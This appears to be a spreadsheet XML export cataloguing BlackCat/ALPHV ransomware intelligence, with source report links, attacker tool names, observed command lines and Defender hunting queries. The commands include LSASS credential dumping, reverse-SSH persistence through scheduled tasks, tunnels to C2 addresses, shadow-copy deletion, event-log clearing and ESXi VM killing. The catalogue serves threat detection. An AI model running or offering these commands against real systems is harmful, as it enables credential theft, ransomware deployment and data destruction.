        <s v="{ &quot;data&quot;: &quot;2023-01012&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;url&quot;: &quot;https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware/&quot;, &quot;tags&quot;: [ &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;url&quot;: &quot;https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware&quot;, &quot;tags&quot;: [ &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{&quot;date&quot;:&quot;2023-04-14&quot;,  &quot;url&quot;: &quot;https://www.varonis.com/blog/blackcat-ransomware&quot;, &quot;tags&quot;: [ &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-12-19&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-05&quot;, &quot;url&quot;: &quot;https://www.sygnia.co/blog/blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quo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x v="0"/>
    <m/>
    <x v="0"/>
    <s v="Targets_x000a_• Windows, 7 to 11, as well as Server 2008r2, 2012,_x000a_2016, 2019, 2022 (XP and 2003 can be encrypted_x000a_over Server Message Block_x000a_• ESXI (at least versions 5.5, 6.5, 7.0.2u)_x000a_• Debian (at least versions 7,8 and 9)_x000a_• Ubuntu (at least versions 18.04 and 20.04)_x000a_• ReadyNAS_x000a_• Synology"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <m/>
    <x v="1"/>
    <s v="Nirsoft"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <s v="mimikatz-pid"/>
    <x v="1"/>
    <s v="Mimikatz"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="3"/>
    <s v="cobaltstr-pid"/>
    <x v="2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="4"/>
    <m/>
    <x v="1"/>
    <s v="ADRecon"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="5"/>
    <s v="psexec-pid"/>
    <x v="1"/>
    <s v="PsExec"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="6"/>
    <m/>
    <x v="1"/>
    <s v="Emotet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="7"/>
    <s v="netscan-pid"/>
    <x v="1"/>
    <s v="Softperfect Netscan"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="8"/>
    <m/>
    <x v="1"/>
    <s v="Bloodhound"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="9"/>
    <m/>
    <x v="1"/>
    <s v="CrackMapExec"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="10"/>
    <m/>
    <x v="1"/>
    <s v="MegaSync"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="11"/>
    <m/>
    <x v="1"/>
    <s v="InVeigh"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="12"/>
    <s v="adfind-pid"/>
    <x v="1"/>
    <s v="AdFind"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="13"/>
    <s v="rubeus-pid"/>
    <x v="1"/>
    <s v="Rubeus"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="14"/>
    <m/>
    <x v="1"/>
    <s v="StealBit"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="15"/>
    <s v="pshell-pid"/>
    <x v="3"/>
    <s v="&quot;C:\&lt;path&gt;\v1.0\powershell.exe -WindowStlye Hidden -C $path = 'C:\Users\user\Desktop\&lt;name&gt;.exe; Get-Process | Where-Object {$_.Path -like $path} | Stop-Process -Force;[byte[]]$arr = new-object byte[] 65536;Set-Content -Path $path -Value $arr;Remove-Item -Path $path;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="16"/>
    <s v="lsass-pid"/>
    <x v="0"/>
    <s v="TA used HOK taskmgr dump lsass"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="17"/>
    <m/>
    <x v="0"/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -command  &amp; {(get-content c:\system -raw | set-content c:\ -stream 'cachetask')}_x000a__x000a_c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f_x000a__x000a_c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask"/>
    <s v="During the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address embedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to C:\ directory and named: system, Windows or cache task._x000a__x000a_It was also observed hidden by writing to an alternate data stream (ADS) of the C:\ directory using the following command:"/>
    <x v="1"/>
  </r>
  <r>
    <x v="18"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="19"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="20"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="21"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="22"/>
    <m/>
    <x v="4"/>
    <s v="c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="23"/>
    <s v="gmer-pid"/>
    <x v="4"/>
    <s v="c:\users\&lt;username&gt;\downloads\gmer\gmer.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="24"/>
    <s v="procdump-pid"/>
    <x v="3"/>
    <s v="c:\windows\system\procdump.exe -accepteula -ma lsass.exe lsass.dmp"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="25"/>
    <s v="dumpert-pid"/>
    <x v="4"/>
    <s v="c:\windows\system\dumpert.exe lsass.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="26"/>
    <s v="comsvcs-pid, rundll-pid"/>
    <x v="3"/>
    <s v="powershell rundll32.exe c:\windows\system32\comsvcs.dll, minidump (get-process lsass).id c:\temp\lsass.dmp full"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="27"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /q /c steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c cd results 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c dir 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1  cmd.exe /q /c del archive.zip 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c del c:\steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="28"/>
    <m/>
    <x v="1"/>
    <s v="hackbrowerdata "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="29"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="30"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\adrecon.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="31"/>
    <s v="teamvwr-pid"/>
    <x v="3"/>
    <s v="cmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:&quot;program files cmd.exe /q /c dir c:&quot;program files (x86) 1 cmd.exe /q /c dir c:&quot;program files (x86)\teamviewer\ cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe --getid"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="32"/>
    <s v="teamvwr-pid"/>
    <x v="3"/>
    <s v="cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe -info"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="33"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /q /c dir c:&quot;program files (x86)\_x000a_cmd.exe /q /c dir c:&quot;program files (x86)&quot;keepass password safe 2\_x000a_cmd.exe /q /c type c:&quot;program files (x86)&quot;keepass password safe 2\keepass.exe.config"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="34"/>
    <m/>
    <x v="3"/>
    <s v="1&gt; \\127.0.0.1\admin$\__&lt;timestamp&gt;.&lt;6 digits&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="35"/>
    <s v="netsh-pid"/>
    <x v="3"/>
    <s v="cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1&gt; \\127.0.0.1\c$\windows\temp\qaiumg 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="36"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="37"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\wevtutil.exe set-log application /enabled:false"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="38"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\wevtutil.exe set-log hardwareevents /enabled:false"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="39"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\wevtutil.exe set-log internet explorer /enabled:false"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="40"/>
    <s v="registry-pid"/>
    <x v="3"/>
    <s v="cmd.exe /q /c reg add hkey_local_machine\system\currentcontrolset\control\lsa /v disablerestrictedadmin /t reg_dword /d 0 1&gt; \\127.0.0.1\admin\$\__&lt;timestamp&gt;\.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="41"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /q /c #upload c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="42"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /q /c #download c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="43"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\apply.ps1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="44"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /q /c gpupdate /force"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="45"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\defender.vbs"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="46"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\def.vbs"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="47"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe --access-token &lt;token&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="48"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="49"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="50"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\cmd.exe /c reg add hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters /v maxmpxct /d 65535 /t reg_dword /f c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="51"/>
    <s v="vss-pid, wmic-pid"/>
    <x v="3"/>
    <s v="c:\windows\system32\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\windows\system32\cmd.exe /c wmic.exe shadowcopy delete c:\windows\system32\cmd.exe /c arp -a c:\windows\system32\cmd.exe /c bcdedit /set {default}"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="52"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\cmd.exe /c cmd.exe /c for /f &quot;tokens=*&quot; %1 in ('wevtutil.exe el') do wevtutil.exe cl &quot;%1&quot;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="53"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="54"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “arp -a”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="55"/>
    <m/>
    <x v="3"/>
    <s v="/c “reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="56"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl %1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="57"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “bcdedit /set {default} recoveryenabled No”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="58"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “bcdedit /set {default}”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="59"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="cmd.exe /c “wmic.exe Shadowcopy Delete”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="60"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “vssadmin.exe Delete Shadows /all /quiet”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="61"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “iisreset.exe /stop”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="62"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “fsutil behavior set SymlinkEvaluation R2R:1”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="63"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c “fsutil behavior set SymlinkEvaluation R2L:1”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="64"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="cmd.exe /c “wmic csproduct get UUID”"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="65"/>
    <m/>
    <x v="5"/>
    <s v="\\.\pipe\__rust_anonymous_pipe1__.&lt;Process ID&gt;.&lt;Random number&gt;"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="66"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="wmic csproduct get UUID"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="67"/>
    <m/>
    <x v="3"/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="68"/>
    <m/>
    <x v="3"/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="69"/>
    <m/>
    <x v="3"/>
    <s v="iisreset.exe /stop"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="70"/>
    <m/>
    <x v="3"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="71"/>
    <m/>
    <x v="3"/>
    <s v="vssadmin.exe delete shadows /all /quiet"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="72"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="wmic shaodwcopy delete"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="73"/>
    <m/>
    <x v="3"/>
    <s v="bcdedit /set {default} recoveryenabled No"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="74"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /c for /F \&quot;tokens=*\&quot; %1 in ('wevtutil.exe el') DO wevtutil.exe cl \&quot;%1\&quot; "/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="75"/>
    <m/>
    <x v="3"/>
    <s v="esxcli --formatter=csv --format-param=fields==&quot;WorldID,DisplayName&quot; vm process list "/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="76"/>
    <m/>
    <x v="3"/>
    <s v="awk -F &quot;\&quot;*,\&quot;*&quot; '{system(&quot;esxcli vm process kill --type=force --world-id=&quot;$1)}' "/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="77"/>
    <m/>
    <x v="3"/>
    <s v="for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="78"/>
    <m/>
    <x v="4"/>
    <s v=" “D:\my\Documents\Visual Studio 2019\setup\obj\Release\setup.pdb”. "/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="79"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="wmic csproduct get UUID "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="80"/>
    <m/>
    <x v="3"/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="81"/>
    <m/>
    <x v="3"/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1 "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="82"/>
    <m/>
    <x v="3"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="83"/>
    <m/>
    <x v="3"/>
    <s v="psexec.exe -accepteula \\&lt;TARGET_HOST&gt; -u &lt;USERNAME&gt; -p &lt;PASSWORD&gt; -s -d -f -c &lt;ALPHV_EXECUTABLE&gt; [FLAGS] [OPTIONS] --access-token &lt;ACCESS_TOKEN&gt; [SUBCOMMAND] "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="84"/>
    <m/>
    <x v="3"/>
    <s v="vssadmin.exe delete shadows /all /quiet "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="85"/>
    <m/>
    <x v="3"/>
    <s v="arp -a "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="86"/>
    <m/>
    <x v="3"/>
    <s v="HKEY_USERS\&lt;SID&gt;\Control Panel\Desktop\WallPaper = &quot;C:\\Users\\&lt;USERNAME&gt;\\Desktop\\RECOVER-&lt;ENCRYPTED_FILE_EXTENSION&gt;-FILES.txt.png&quot; "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="87"/>
    <m/>
    <x v="3"/>
    <s v="for /F \&quot;tokens=*\&quot; %1 in ('wevtutil.exe el') DO wevtutil.exe cl \&quot;%1\&quot;&quot; "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="88"/>
    <m/>
    <x v="3"/>
    <s v="esxcli --formatter=csv --format-param=fields==&quot;WorldID,DisplayName&quot; vm process list "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="89"/>
    <m/>
    <x v="3"/>
    <s v="awk -F &quot;\&quot;*,\&quot;*&quot; '{system(&quot;esxcli vm process kill --type=force --world-id=&quot;$1)}' "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="90"/>
    <m/>
    <x v="3"/>
    <s v="for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="91"/>
    <m/>
    <x v="3"/>
    <s v="esxcli --formatter=csv --format-param=fields==&quot;WorldID,DisplayName&quot; vm process list | awk -F &quot;\&quot;*,\&quot;*&quot; '{system(&quot;esxcli vm process kill --type=force --world-id=&quot;$1)}' "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="92"/>
    <m/>
    <x v="3"/>
    <s v="for i in `vim-cmd vmsvc/getallvms | awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="93"/>
    <s v="vss-pid"/>
    <x v="3"/>
    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="94"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="wmic.exe Shadowcopy Delete"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="95"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="wmic csproduct get UUID"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="96"/>
    <m/>
    <x v="3"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="97"/>
    <m/>
    <x v="3"/>
    <s v="for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\”"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="98"/>
    <m/>
    <x v="3"/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="99"/>
    <m/>
    <x v="3"/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="100"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net use \\[computer name]  /user:[domain]\[user] [password] /persistent:no"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="101"/>
    <m/>
    <x v="3"/>
    <s v="C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="102"/>
    <m/>
    <x v="3"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="103"/>
    <s v="vss-pid"/>
    <x v="3"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="104"/>
    <s v="wmic-pid"/>
    <x v="3"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="105"/>
    <m/>
    <x v="3"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “cmd.exe /c  for /F \”tokens=*\” Incorrect function. in (‘ wevtutil.exe el ‘) DO wevtutil.exe cl \”Incorrect function. \””"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="106"/>
    <s v="lsass-pid"/>
    <x v="0"/>
    <s v="Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive."/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="107"/>
    <m/>
    <x v="3"/>
    <s v="Get-ADRGPO"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="108"/>
    <m/>
    <x v="3"/>
    <s v="Get-ADRDNSZone"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="109"/>
    <m/>
    <x v="3"/>
    <s v="Get-ADRGPLink"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="110"/>
    <m/>
    <x v="6"/>
    <s v="An active ‘BlackCat’ ransomware was detected_x000a_‘BlackCat’ ransomware was detected_x000a_BlackCat ransomware"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="111"/>
    <m/>
    <x v="7"/>
    <s v="DeviceProcessEvents_x000a_| where InitiatingProcessFolderPath has &quot;PerfLogs&quot;_x000a_| where InitiatingProcessFileName matches regex &quot;[a-z]{3}.exe&quot;_x000a_| extend Length = strlen(InitiatingProcessFileName)_x000a_| where Length == 7"/>
    <s v="Suspicious process execution in PerfLogs path"/>
    <x v="5"/>
  </r>
  <r>
    <x v="112"/>
    <m/>
    <x v="7"/>
    <s v="DeviceProcessEvents_x000a_| where ProcessCommandLine has_all(&quot;LanmanServer&quot;, &quot;parameters&quot;, &quot;MaxMpxCt&quot;, &quot;65535&quot;)"/>
    <s v="Suspicious registry modification of MaxMpxCt parameters"/>
    <x v="5"/>
  </r>
  <r>
    <x v="113"/>
    <m/>
    <x v="7"/>
    <s v="DeviceProcessEvents_x000a_| where ProcessCommandLine has_all(&quot;--access-token&quot;, &quot;-v&quot;) _x000a_| extend CommandArguments = split(ProcessCommandLine, &quot; &quot;)_x000a_| mv-expand CommandArguments_x000a_| where CommandArguments matches regex &quot;^[A-Fa-f0-9]{64}$&quot;"/>
    <s v="Suspicious command line indicative of BlackCat ransom payload execution"/>
    <x v="5"/>
  </r>
  <r>
    <x v="114"/>
    <m/>
    <x v="7"/>
    <s v="DeviceProcessEvents_x000a_| where InitiatingProcessCommandLine has &quot;--access-token&quot;_x000a_| where ProcessCommandLine has &quot;get uuid&quot;"/>
    <s v="Suspicious command line indicative of BlackCat ransom payload execution"/>
    <x v="5"/>
  </r>
  <r>
    <x v="115"/>
    <m/>
    <x v="7"/>
